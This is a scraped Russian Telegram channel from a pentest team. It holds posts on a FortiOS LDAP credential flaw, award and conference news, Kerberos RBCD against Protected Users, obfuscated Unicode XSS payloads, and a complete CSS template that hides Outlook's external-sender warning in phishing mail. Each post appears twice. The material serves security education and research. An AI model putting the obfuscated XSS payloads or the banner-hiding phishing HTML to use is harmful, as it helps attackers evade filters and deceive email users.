[ CVE-2024-32122 FortiOS ]
Всем привет!👋
Недавно мы с @VlaDriev зарегистрировали CVE, которая встречается в различных устройствах и продуктах Fortinet.
Процесс регистрации немного затянулся, багу закинули вендору еще весной 2024 года. Нам сразу же ответили и подтвердили наличие уязвимости, но вот исправить ее смогли только спустя год.
Эта уязвимость позволяет получить учетные данные от LDAP в открытом виде. Злоумышленнику нужно лишь частично изменить конфигурацию коннектора.
Для эксплуатации нам нужно знать пароль от уязвимого устройства линейки Fortinet. Казалось бы — уязвимость минорная, да ещё мол и пароль привилегированной УЗ надо достать, чтобы поковыряться в конфигурациях. И Вы будете правы с данными тезисами, но давайте взглянем на проблему комплексно.
➡️ Во-первых, ярким примером таких устройств, конечно, являются МФУ: многие внутрянщики знают, что принтеры являются лакомым куском для атакующих, но не одними принтерами едины. Уязвимыми также могут быть CMS, камеры, сетевое оборудование и многие другие устройства.🚨
➡️ Во-вторых, проблема в том, что такие устройства не живут в инфраструктурах в вакууме, а сконфигурированы в связке с какими-то сервисами.
Приведем пример: настроили МФУ, чтобы оно могло отправлять сообщения по SMTP на почту, также настроили аутентификацию по LDAP, чтобы загружался список контактов, а еще — SMB, чтобы сразу можно было складывать отсканированные файлы на сетевую шару.
На практике, попав в консоль управления такого устройства, мы можем менять IP-адрес коннектора на подконтрольный нам. Таким образом, нам достаточно поднять
И всё-таки, доступ же надо как-то получить к этим конфигурациям? Да, но на практике многие устройства подвержены ряду недостатков/уязвимостей:
▪️ УД по умолчанию — база на принтерах.
▪️ IDOR (выделен отдельно от уязвимостей, потому что встречается часто).
▪️ Также часто выстреливают какие-то XXE/Path traversal уязвимости, позволяющие достать содержимое конфига.
И как мы уже сказали выше — эти устройства не живут сами по себе, а на практике интегрированы в доменную инфраструктуру, в частности, в
Получив УЗ мы можем сразу делать relay на LDAP, на центр сертификации (AD CS) и вот мы уже в шаге от доменного администратора или как минимум можем залутать валидную доменную УЗ и собирать дальше информацию о домене.
Здесь надо понимать, что особенно во внутреннем периметре всё очень хрупкое и часто получается выстроить цепочку атак. Поэтому мелочей здесь не бывает, и даже low-баги по шкале CVSS могут выстроиться в крутую цепочку повышения привилегий и вывести вас в дамки.
Какой итог? Подходить к вопросам безопасности любой инфраструктуры надо комплексно, ни один реальный хакер не будет ограничиваться ТЗ/строгим скоупом ресурсов, как часто это бывает на пентестах. Он будет искать любую зацепку для компрометации ваших IT-активов. Будьте грамотны и смотрите на вопросы безопасности с разных сторон
@GigaHack
#internal #pentest #AD #CVE
Всем привет!
Недавно мы с @VlaDriev зарегистрировали CVE, которая встречается в различных устройствах и продуктах Fortinet.
Процесс регистрации немного затянулся, багу закинули вендору еще весной 2024 года. Нам сразу же ответили и подтвердили наличие уязвимости, но вот исправить ее смогли только спустя год.
Эта уязвимость позволяет получить учетные данные от LDAP в открытом виде. Злоумышленнику нужно лишь частично изменить конфигурацию коннектора.
Для эксплуатации нам нужно знать пароль от уязвимого устройства линейки Fortinet. Казалось бы — уязвимость минорная, да ещё мол и пароль привилегированной УЗ надо достать, чтобы поковыряться в конфигурациях. И Вы будете правы с данными тезисами, но давайте взглянем на проблему комплексно.
Приведем пример: настроили МФУ, чтобы оно могло отправлять сообщения по SMTP на почту, также настроили аутентификацию по LDAP, чтобы загружался список контактов, а еще — SMB, чтобы сразу можно было складывать отсканированные файлы на сетевую шару.
На практике, попав в консоль управления такого устройства, мы можем менять IP-адрес коннектора на подконтрольный нам. Таким образом, нам достаточно поднять
responder в режиме анализа и получить clear-text или хэш указанных учетных данных.И всё-таки, доступ же надо как-то получить к этим конфигурациям? Да, но на практике многие устройства подвержены ряду недостатков/уязвимостей:
И как мы уже сказали выше — эти устройства не живут сами по себе, а на практике интегрированы в доменную инфраструктуру, в частности, в
Active Directory. Получив УЗ мы можем сразу делать relay на LDAP, на центр сертификации (AD CS) и вот мы уже в шаге от доменного администратора или как минимум можем залутать валидную доменную УЗ и собирать дальше информацию о домене.
Здесь надо понимать, что особенно во внутреннем периметре всё очень хрупкое и часто получается выстроить цепочку атак. Поэтому мелочей здесь не бывает, и даже low-баги по шкале CVSS могут выстроиться в крутую цепочку повышения привилегий и вывести вас в дамки.
Какой итог? Подходить к вопросам безопасности любой инфраструктуры надо комплексно, ни один реальный хакер не будет ограничиваться ТЗ/строгим скоупом ресурсов, как часто это бывает на пентестах. Он будет искать любую зацепку для компрометации ваших IT-активов. Будьте грамотны и смотрите на вопросы безопасности с разных сторон
@GigaHack
#internal #pentest #AD #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥15👍8💯2🦄2
[ GigaHackers в шорт-листе премии pentest award ]
Всем привет, друзья!👋
На днях опубликовали шорт-лист номинантов премии pentest award от Awillix.✅
Наши кейсы не остались в стороне в этом году, попали в шорт-лист по следующим номинациям:
➡️ Пробив WEB
@VlaDriev и я вместе с ним (совместная работа двух🔥 🎆 )
➡️ «**ck the logic»
@Oki4_Doki (ето я)
➡️ «Ловись рыбка»
@Oki4_Doki (ето я)
➡️ «Out of Scope»
Снова @VlaDriev (в тройке с нашими друзьями-коллегами. Очень интересная для сообщества этичных хакеров работа!)
Также приятно видеть в списке очень много знакомых и сильных специалистов⚡️
P/S в том году @VlaDriev и @WILD_41 попали в шорт-лист, а Влад занял 2 место в номинации "девайс". Посмотрим, сможем ли в этом году также попасть в тройку, награждение состоится уже совсем скоро 1 августа в 18:30 по Мск. 👉 Трансляция мероприятия будет доступна по ссылке.
#pentestaward
Всем привет, друзья!
На днях опубликовали шорт-лист номинантов премии pentest award от Awillix.
Наши кейсы не остались в стороне в этом году, попали в шорт-лист по следующим номинациям:
@VlaDriev и я вместе с ним (совместная работа двух
GigaHacker-ов @Oki4_Doki (ето я)
@Oki4_Doki (ето я)
Снова @VlaDriev (в тройке с нашими друзьями-коллегами. Очень интересная для сообщества этичных хакеров работа!)
Также приятно видеть в списке очень много знакомых и сильных специалистов
P/S в том году @VlaDriev и @WILD_41 попали в шорт-лист, а Влад занял 2 место в номинации "девайс". Посмотрим, сможем ли в этом году также попасть в тройку, награждение состоится уже совсем скоро 1 августа в 18:30 по Мск. 👉 Трансляция мероприятия будет доступна по ссылке.
#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥19❤6👍4👎1🦄1
[ Итоги премии pentest award ]
Друзья, всем привет!👋
Недавно прошла церемония награждения премии Pentest award 2025▶️
В этом году GigaHackers укрепили свои позиции:
@VlaDriev занял 3 место вместе с нашими друзьями-коллегами @Levatein, @N4m3U53r в номинации "Out of scope" с ресерчем⚡️
Чуть позже выпустим на канале отдельный пост про инструмент с обзором и нюансами🏇
Мне же удалось занять 2 место в номинации "Hack the logic" за поиск логических уязвимостей. В кейсе смог реализовать уязвимость в платежной логике: осуществил реальное списание денежных средств клиента по поддельным данным + мог массово генерировать чеки об оплате, тем самым исчерпывая свободное место на файловом хранилище организации.
Помимо этого хотим также поздравить наших коллег и товарищей с призовыми местами:
@s0i37_channel с 2 местом в номинации "Out of scope" с работой "Google в локалке".
@Alevuc с 2 местом в номинации "Ловись рыбка" с работой "Когда CRM — твой враг, а телеграм зло во плоти"
С остальными результатами и итогами можете ознакомиться👉 тут.
Большое спасибо организаторам, все было как всегда на высочайшем уровне! Обязательно будем принимать участие в следующем году.
@GigaHack
#pentestaward
Друзья, всем привет!
Недавно прошла церемония награждения премии Pentest award 2025
В этом году GigaHackers укрепили свои позиции:
@VlaDriev занял 3 место вместе с нашими друзьями-коллегами @Levatein, @N4m3U53r в номинации "Out of scope" с ресерчем
BloodHoundIPA - ребята сделали fork популярного инструмента BloodHound для анализа доменов Active Directory и адаптировали его под домены на базе FreeIPA Чуть позже выпустим на канале отдельный пост про инструмент с обзором и нюансами
Мне же удалось занять 2 место в номинации "Hack the logic" за поиск логических уязвимостей. В кейсе смог реализовать уязвимость в платежной логике: осуществил реальное списание денежных средств клиента по поддельным данным + мог массово генерировать чеки об оплате, тем самым исчерпывая свободное место на файловом хранилище организации.
Помимо этого хотим также поздравить наших коллег и товарищей с призовыми местами:
@s0i37_channel с 2 местом в номинации "Out of scope" с работой "Google в локалке".
@Alevuc с 2 местом в номинации "Ловись рыбка" с работой "Когда CRM — твой враг, а телеграм зло во плоти"
С остальными результатами и итогами можете ознакомиться
Большое спасибо организаторам, все было как всегда на высочайшем уровне! Обязательно будем принимать участие в следующем году.
@GigaHack
#pentestaward
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥22🏆10👍5❤2🤮1
[ Интернациональные XSS ]
Всем привет!👋
Собрали для Вас необычную подборку "обфусцированных" XSS-like пейлоадов на разных языках🔥
XSS по-армянски 🇦🇲
XSS по-русски 🇷🇺
XSS по-китайски 🇨🇳
На самом деле вся "магия" заключается в том, что в JavaScript имена переменных могут содержать не только привычную латиницу, но и символы в
А сама нагрузка здесь представляет собой конкатенацию строк + преобразование типов, которая собирается в вызов
Здесь в очередной раз хочется напомнить, что зачастую много интересных техник можно реализовать штатными средствами, если внимательно изучить документацию/RFC и иные справки используемой технологии.
Изучайте технологии фундаментально, не спешите, читайте🔍
@GigaHack
#xss #obfuscation #web
Всем привет!
Собрали для Вас необычную подборку "обфусцированных" XSS-like пейлоадов на разных языках
XSS по-армянски 🇦🇲
ա="",բ=!ա+ա,գ=!բ+ա,դ=ա+{},ե=բ[ա++],զ=բ[է=ա],ը=++է+ա,թ=դ[է+ը],
բ[թ+=դ[ա]+(բ.գ+դ)[ա]+գ[ը]+ե+զ+բ[է]+թ+ե+դ[ա]+զ][թ](գ[ա]+գ[է]+բ[ը]+զ+ե+"('GigaHackers Ձեզ հարձակվել են')")()XSS по-русски 🇷🇺
а='',б=!а+а,в=!б+а,г=а+{},д=б[а++],е=б[ж=а],
з=++ж+а,и=г[ж+з],б[и+=г[а]+(б.в+г)[а]+в[з]+д+е+б[ж]+и+д+г[а]+е][и](в[а]+в[ж]+б[з]+е+д+"('GigaHackers '+ document.domain)")()XSS по-китайски 🇨🇳
甲='',乙=!甲+甲,丙=!乙+甲,丁=甲+{},戊=乙[甲++],己=乙[庚=甲],
辛=++庚+甲,壬=丁[庚+辛],
乙[壬+=丁[甲]+(乙.丙+丁)[甲]+丙[辛]+戊+己+乙[庚]+壬+戊+丁[甲]+己][壬](
丙[甲]+丙[庚]+乙[辛]+己+戊+"('GigaHackers 受到攻击')"
)()На самом деле вся "магия" заключается в том, что в JavaScript имена переменных могут содержать не только привычную латиницу, но и символы в
Unicode (в том числе символы из различных алфавитов). А сама нагрузка здесь представляет собой конкатенацию строк + преобразование типов, которая собирается в вызов
Function("alert('GigaHackers_text')")()Здесь в очередной раз хочется напомнить, что зачастую много интересных техник можно реализовать штатными средствами, если внимательно изучить документацию/RFC и иные справки используемой технологии.
Изучайте технологии фундаментально, не спешите, читайте
man, и перед вами откроются новые двери@GigaHack
#xss #obfuscation #web
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥20👍7😁5🤡4👎2
[Подкаст «Метод хакера»]
Всем привет!👋
Летом прошла запись подкаста «Метод хакера», где я выступил экспертом. Сегодня выпуск доступен к прослушиванию на разных площадках💬 🎵 💬 🎵 .
Мы провели детальный разбор пентеста с точки зрения инструмента защиты инфраструктуры. Несколько ключевых вопросов выпуска:
➡️ Что скрывается за термином «пентест» и зачем он нужен?
➡️ Можно ли доверять сторонним специалистам по пентесту или лучше держать специалистов внутри компании?
➡️ Какие инструменты используют пентестеры?
➡️ Как автоматизировать пентесты на уровне отдельного исполнителя и в масштабах инфраструктуры компании?
Слушать выпуск «Лучшая защита – нападение. А автонападение – еще лучше».
@GigaHack
#gigahack #pentest #talk
Всем привет!
Летом прошла запись подкаста «Метод хакера», где я выступил экспертом. Сегодня выпуск доступен к прослушиванию на разных площадках
Мы провели детальный разбор пентеста с точки зрения инструмента защиты инфраструктуры. Несколько ключевых вопросов выпуска:
Спасибо за приглашение поучаствовать в проекте! Простым языком обсудили пентесты и их автоматизацию как на уровне отдельного исполнителя, так и в масштабах инфраструктуры компании. Подкаст будет понятен и полезен всем - профессионалам и начинающим.
Слушать выпуск «Лучшая защита – нападение. А автонападение – еще лучше».
@GigaHack
#gigahack #pentest #talk
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍5❤1💅1
[ Когда Outlook перестает сомневаться ]
Всем привет!👋
В последнее время кампании по социальной инженерии все больше осложняются надстроенными средствами защиты. Одним из часто встречаемых механизмов является плашка в Outlook о внешнем отправителе. Думаю, многие коллеги, работающие с корпоративной почтой, не раз видели огромный алерт желто-красного цвета на пол письма с предупреждением о письме с внешнего доменного имени. Такая сигнализация резко повышает бдительность конечных пользователей, которых пытаются фишить.
Однако с этим механизмом защиты есть нюанс. Недавно мы писали пост об "интернациональных XSS". Главный месседж в нем был в понимании фундаментальных основ. В этом посте я в очередной раз подсвечу, что иногда решение проблемы в offensive-индустрии может скрываться на поверхности и не требовать программирования на ассемблере с бубном в руках.
Если мы сохраним письмо от "внешнего отправителя" как формат HTML в клиенте outlook-а, то увидим, что технически всё наше письмо и является HTML-кодом, в который была вставлена плашка в тело письма с сообщением, настроенным на Exchange-сервере администраторами (рис. 1).
Но раз мы рассылаем письма, значит под нашим контролем всё содержимое HTML-письма, которое мы направляем и корректируем. А для обхода всплывающего содержимого нам достаточно вспомнить CSS и его возможности: попробуем запретить отображение всего кроме нашей легенды письма с помощью магии CSS:
Здесь мы всё красим в белый кроме своего уникального
На рис.2 пример отправки письма без указанных CSS-стилей, а на рис.3 уже с применением нашей хитрости.
P/S стоит отметить, что в окне предпросмотра клиента Outlook-а текст с алертом всё ещё будет виден, если администраторы настроили вставку плашки в начало сообщения (рис. 4). Но тем не менее сама плашка визуально не отображается, и в потоке писем это может дать нам очки бонуса, как атакующим.
В фишинговых кампаниях мелочей не бывает, важны детали и любые нюансы. И если даже одна эта деталь сможет снизить бдительность сотрудника, то фишинговую кампанию можно будет считать успешной.
Об этой технике известно как минимум с 19-21 годов, более развернутое описание вы можете посмотреть тут, а приложенный PoC тут.
Таким образом, если ты понял правила игры, то можешь их адаптировать под себя
@GigaHack
#social #outlook #bypass
Всем привет!
В последнее время кампании по социальной инженерии все больше осложняются надстроенными средствами защиты. Одним из часто встречаемых механизмов является плашка в Outlook о внешнем отправителе. Думаю, многие коллеги, работающие с корпоративной почтой, не раз видели огромный алерт желто-красного цвета на пол письма с предупреждением о письме с внешнего доменного имени. Такая сигнализация резко повышает бдительность конечных пользователей, которых пытаются фишить.
Однако с этим механизмом защиты есть нюанс. Недавно мы писали пост об "интернациональных XSS". Главный месседж в нем был в понимании фундаментальных основ. В этом посте я в очередной раз подсвечу, что иногда решение проблемы в offensive-индустрии может скрываться на поверхности и не требовать программирования на ассемблере с бубном в руках.
Если мы сохраним письмо от "внешнего отправителя" как формат HTML в клиенте outlook-а, то увидим, что технически всё наше письмо и является HTML-кодом, в который была вставлена плашка в тело письма с сообщением, настроенным на Exchange-сервере администраторами (рис. 1).
Но раз мы рассылаем письма, значит под нашим контролем всё содержимое HTML-письма, которое мы направляем и корректируем. А для обхода всплывающего содержимого нам достаточно вспомнить CSS и его возможности: попробуем запретить отображение всего кроме нашей легенды письма с помощью магии CSS:
<html>
<head>
<style type="text/css">
body {
display: none !important;
background:#FFFFFF !important;
}
.id100500 {
display: block !important;
}
div[style] {
display: none !important;
background:#FFFFFF !important;
}
p {
display: none !important;
background:#FFFFFF !important;
}
p[style] {
display: none !important;
background:#FFFFFF !important;
}
span {
display: none !important;
background: #FFFFFF !important;
}
span[style] {
display: none !important;
background:#FFFFFF !important;
}
table[style] {
display: none !important;
background:#FFFFFF !important;
}
table {
display: none !important;
background:#FFFFFF !important;
}
td {
display: none !important;
background:#FFFFFF !important;
}
td[style] {
display: none !important;
background:#FFFFFF !important;
}
tr {
display: none !important;
background:#FFFFFF !important;
}
tr[style] {
display: none !important;
background:#FFFFFF !important;
}
tbody {
background:#FFFFFF !important;
display: none !important;
}
tbody[style] {
display: none !important;
background:#FFFFFF !important;
}
</style>
</head>
<body>
<p class="id100500">Привет!</p>
<p class="id100500">Это обманка </p>
</body>
</html>
Здесь мы всё красим в белый кроме своего уникального
class=id100500.На рис.2 пример отправки письма без указанных CSS-стилей, а на рис.3 уже с применением нашей хитрости.
P/S стоит отметить, что в окне предпросмотра клиента Outlook-а текст с алертом всё ещё будет виден, если администраторы настроили вставку плашки в начало сообщения (рис. 4). Но тем не менее сама плашка визуально не отображается, и в потоке писем это может дать нам очки бонуса, как атакующим.
В фишинговых кампаниях мелочей не бывает, важны детали и любые нюансы. И если даже одна эта деталь сможет снизить бдительность сотрудника, то фишинговую кампанию можно будет считать успешной.
Об этой технике известно как минимум с 19-21 годов, более развернутое описание вы можете посмотреть тут, а приложенный PoC тут.
Таким образом, если ты понял правила игры, то можешь их адаптировать под себя
@GigaHack
#social #outlook #bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥23👍9❤1💘1
[ BUGS ZONE 6.0 ]
Всем привет!👋
Не так давно выступил с небольшим докладом на приватном мероприятии для багхантеров от BI.ZONE Bug Bounty🪲
Интересный опыт выступления в камерном сообществе перед рядом сильнейших хантеров. Приятно удивлен, что часть людей задавала вопросы после выступления как лично на ивенте, так и в ЛС (хотя сам свой доклад оцениваю больше для начинающих).
Также теперь мой ник 1 из 38 "увековеченных" участников ивента на плакате😎
Приятная мелочь, так как помню о первых багах и посещение BUGS 3 ещё в качестве гостя, а не хантера
Спасибо @BIZONE_BB и вендорам за приглашение в приватки, а победителей поздравляю с попаданием в топ-5, вы круты!
Был рад пообщаться со старыми товарищами и познакомиться с новыми людьми в комьюнити!🔝
@GigaHack
#bug_bounty #bugs_zone6 #conference
Всем привет!
Не так давно выступил с небольшим докладом на приватном мероприятии для багхантеров от BI.ZONE Bug Bounty
Интересный опыт выступления в камерном сообществе перед рядом сильнейших хантеров. Приятно удивлен, что часть людей задавала вопросы после выступления как лично на ивенте, так и в ЛС (хотя сам свой доклад оцениваю больше для начинающих).
Также теперь мой ник 1 из 38 "увековеченных" участников ивента на плакате😎
Приятная мелочь, так как помню о первых багах и посещение BUGS 3 ещё в качестве гостя, а не хантера
Спасибо @BIZONE_BB и вендорам за приглашение в приватки, а победителей поздравляю с попаданием в топ-5, вы круты!
Был рад пообщаться со старыми товарищами и познакомиться с новыми людьми в комьюнити!
@GigaHack
#bug_bounty #bugs_zone6 #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍4❤3💋1
[SOC Forum 2025]
А пока я выступал на BUGS — @VlaDriev готовился к выступлению на SOC Forum 2025.
Старт доклада уже скоро👋
Приглашаем вас послушать доклад "Автоматизация рутины пентеста и почему мало кто так делает".
📆 20.11.2025 в 11:00 Мск, зал 4.
Трансляция здесь.🚀
➡️ Проект за проектом, год за годом в процессе проведения пентеста приходится выполнять достаточно много рутинных действий. Это не только утомляет, но и неизбежно приводит к ошибкам, которые могут негативно повлиять на ИТ-инфраструктуру заказчика.
➡️ В рамках доклада мы расскажем о своем опыте автоматизации рутины пентеста, проблемах, с которыми столкнулись, особенностях известных инструментов (Masscan, NetExec, Impacket, NTLM Relay и других), а также о том, как тестировали полученные решения.
@GigaHack
#pentest #soc_forum2025 #conference
А пока я выступал на BUGS — @VlaDriev готовился к выступлению на SOC Forum 2025.
Старт доклада уже скоро
Приглашаем вас послушать доклад "Автоматизация рутины пентеста и почему мало кто так делает".
Трансляция здесь.
@GigaHack
#pentest #soc_forum2025 #conference
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍9🦄1
[ Нюансы RBCD ]
Всем привет, друзья! В завершении года хочу поделиться интересным нюансом, связанным с эксплуатацией ограниченного делегирования на основе ресурсов Kerberos (англ. RBCD) в Active Directory🔩
Многие специалисты по внутреннему пентесту знакомы с различными техниками абуза RBCD, поэтому детально вдаваться в механизм работы не буду, приложу дополнительно пару хороших мануалов про RBCD в целом:
👉 1.
👉 2.
Перейдем сразу к интересной особенности
На проекте мне в очередной раз встретилась группа "Protected Users", в которую коллеги корректно включили всех администраторов домена для защиты их УЗ от ряда техник и атак. (скриншот 1)🐕
В том числе пользователи этой группы не могут быть "олицетворены" (в простонародье "имперсонированы") при делегировании привилегий (абуз RBCD невозможен).
Однако, мне удалось запросить сервисный тикет на учетную запись 111-administrator (это была встроенная УЗ администратора домена с измененным именем; по умолчанию называется просто administrator или "администратор" в ru-доменах с RID-500). Запрос ST можно увидеть на скриншоте 2.
Затем успешно использовать его для захвата необходимой мне машины (скриншот 3 с доступом к C$)⚡️
Прочитав побольше информации о данной УЗ, нашел пару тезисов об этом здесь:
https://sensepost.com/blog/2023/protected-users-you-thought-you-were-safe-uh/
А также нюанс упоминается и на "рецептах хакера" (скриншот 4)
Сам Microsoft пишет следующее😭
Думаю, соответственно, и митигации группы Protected Users на неё не действуют
Таким образом, можно сделать вывод, что Protected Users не панацея от RBCD. Остается помнить об УЗ дефолтного администратора с RID 500 и предпринимать дополнительные меры по защите (возможно, самой лучшей мерой будет являться в целом отключение данной УЗ)
Снова акцентируем внимание на том, что защита должна быть комплексной, не бывает волшебной кнопки в оснастке администратора/волшебной железки вида Ultimate ProMax Security NGWF. Всё должно работать системно, внедрены и оборудование, и мониторинг, применены митигации в самой инфраструктуре, а также конечно же процессы с людьми👨💻
@GigaHack
#pentest #internal #AD
Всем привет, друзья! В завершении года хочу поделиться интересным нюансом, связанным с эксплуатацией ограниченного делегирования на основе ресурсов Kerberos (англ. RBCD) в Active Directory
Многие специалисты по внутреннему пентесту знакомы с различными техниками абуза RBCD, поэтому детально вдаваться в механизм работы не буду, приложу дополнительно пару хороших мануалов про RBCD в целом:
👉 1.
👉 2.
Перейдем сразу к интересной особенности
На проекте мне в очередной раз встретилась группа "Protected Users", в которую коллеги корректно включили всех администраторов домена для защиты их УЗ от ряда техник и атак. (скриншот 1)
В том числе пользователи этой группы не могут быть "олицетворены" (в простонародье "имперсонированы") при делегировании привилегий (абуз RBCD невозможен).
Однако, мне удалось запросить сервисный тикет на учетную запись 111-administrator (это была встроенная УЗ администратора домена с измененным именем; по умолчанию называется просто administrator или "администратор" в ru-доменах с RID-500). Запрос ST можно увидеть на скриншоте 2.
Затем успешно использовать его для захвата необходимой мне машины (скриншот 3 с доступом к C$)
Прочитав побольше информации о данной УЗ, нашел пару тезисов об этом здесь:
https://sensepost.com/blog/2023/protected-users-you-thought-you-were-safe-uh/
А также нюанс упоминается и на "рецептах хакера" (скриншот 4)
Сам Microsoft пишет следующее
The builtin domain Administrator (S-1-5-<domain>-500) is always exempt from Authentication Policies, even when they are assigned to an Authentication Policy Silo
Думаю, соответственно, и митигации группы Protected Users на неё не действуют
Таким образом, можно сделать вывод, что Protected Users не панацея от RBCD. Остается помнить об УЗ дефолтного администратора с RID 500 и предпринимать дополнительные меры по защите (возможно, самой лучшей мерой будет являться в целом отключение данной УЗ)
Снова акцентируем внимание на том, что защита должна быть комплексной, не бывает волшебной кнопки в оснастке администратора/волшебной железки вида Ultimate ProMax Security NGWF. Всё должно работать системно, внедрены и оборудование, и мониторинг, применены митигации в самой инфраструктуре, а также конечно же процессы с людьми
@GigaHack
#pentest #internal #AD
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥14👍8☃4💯2🥱1